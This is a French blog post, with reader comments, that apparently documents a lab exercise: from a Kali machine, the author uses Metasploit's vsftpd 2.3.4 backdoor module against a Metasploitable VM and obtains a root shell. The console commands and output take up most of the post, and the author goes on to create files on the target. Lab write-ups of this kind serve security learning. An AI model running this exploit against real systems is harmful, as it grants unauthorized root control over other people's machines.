Cet article contient des techniques pouvant être dangereuses si elles sont utilisées à mauvais escient.
Je ne suis pas responsable d'utilisations illégales et d'éventuels problèmes avec la loi en cas d'utilisation malveillante.
J'ai effectué cette expérience avec une machine Kali et une autre sous Metasploitable. La machine attaquante sous Kali a l'IP 192.168.1.33 et la cible sous Metasploitable l'IP 192.168.1.38. J'utilise METASPLOIT afin de réaliser ce hack.
┌──(root㉿kali)-[/home/hau]
└─# msfconsole
msf6 > search vsftpd (Recherche Exploit)
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution (Nous avons l'exploit vsftpd_234_backdoor de 2011)
msf6 > info exploit/unix/ftp/vsftpd_234_backdoor (Afin d'avoir des infos sur l'exploit)
Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix (Plateforme visée, ici Unix)
Rank: Excellent (donne le niveau de facilité d'exploitation, ici très peu de configuration et d'interaction à faire en amont. Le rang Excellent donne les vulnérabilités les plus critiques))
Disclosed: 2011-07-03 (date de découverte)
Basic options: (Les options...)
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor (Pour lancer l'exploit; toujours respecter le chemin)
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > (On entre dans la configuration de l'exploit)
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options (Pour voir les options requises)
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit (Nous indique que l'option RHOSTS est à remplir, correspond à l'IP de la machine cible, de l'hôte distant)
RPORT 21 yes The target port (TCP)
A savoir que j'utiliserai cet exploit pour attaquer la machine Metasploitable. J'ai volontairement passé l'étape du scan permettant de découvrir cette faille dans la machine Metasploitable.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.38 (Me permet d'attribuer l'IP de la machine cible (Metasploitable) à l'exploit)
RHOSTS => 192.168.1.38
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options (Pour vérifier l'attribution de l'IP)
RHOSTS 192.168.1.38 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit (Je peux voir que l'IP a été attribuée à la cible)
Nous allons pouvoir attaquer notre machine cible:
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.38:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.38:21 - USER: 331 Please specify the password.
[+] 192.168.1.38:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.38:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.33:33335 -> 192.168.1.38:6200) at 2022-06-13 14:19:03 +0200 (Je peux voir que j'obtiens une session qui m'a connecté à la machine Metasploitable depuis ma machine attaquante dont l'IP est 192.168.1.33)
Désormais les commandes que je taperai depuis ma console d'attaque msf s'exécuteront directement sur la machine cible dont je viens de prendre le contrôle complet... On peut donc voir le niveau Excellent de cet exploit.
Je vais taper pwd sur ma machine attaquante afin de voir dans quel répertoire de je trouve:
pwd
/ (racine /)
cd /root (Pour changer de répertoire)
Je me rends dans ma machine Metasploitable:
ls /root (pour voir ce que j'ai dans le répertoire root)
bonjour.txt Desktop reset_logs.sh vnc.log (soit 4 fichiers)
Je retourne dans ma machine attaquante:
touch salut.txt (Je crée un fichier sur la machine Metasploitable)
Je retourne sur la machine cible et je refais un ls /root:
bonjour.txt Desktop reset_logs.sh vnc.log salut.txt (J'ai à présent un 5ème fichier, celui que j'ai créé dans ma machine Kali attaquante, dans mon répertoire root)
Ayant le contrôle total, je peux supprimer des fichiers, redémarrer la machine, etc.
Ainsi la commande:
whoami
root (M'indique que je suis root, avec les droits, sur le système cible)
Tout ceci pour montrer ce que l'on peut faire. Toutefois, manque l'étape de la reconnaissance/scanning réseau qui permet de trouver la vulnérabilité; la plus importante ! J'y reviendrai ultérieurement.

Super mais je connais déjà
RépondreSupprimerC'est bizarrement un peu trop facile. Sur quelle vulnérabilité exactement se base votre attaque s'il vous plaît ? Je suis étudiant et cela me permettra de savoir à quoi m'attendre.
RépondreSupprimerBonne réaction ! L'article ne porte que sur les possibilités de METASPLOITABLE. Donc manquent volontairement toutes les phases pré-exploitation. J'y viendrai ultérieurement. "Bizarrement un peu trop facile"... Oui ! C'est peut être ce que l'on peut reprocher à MESTPLOITABLE. Mais ça reste un bon outil pour comprendre ce que l'on fait et apprendre. Après votre message, je pense donc mettre en ligne les phases de reconnaissance, détermination des vulnérabilités existantes, l'analyse des ces vulnérabilités qui mènent à l'exploitation....
Supprimer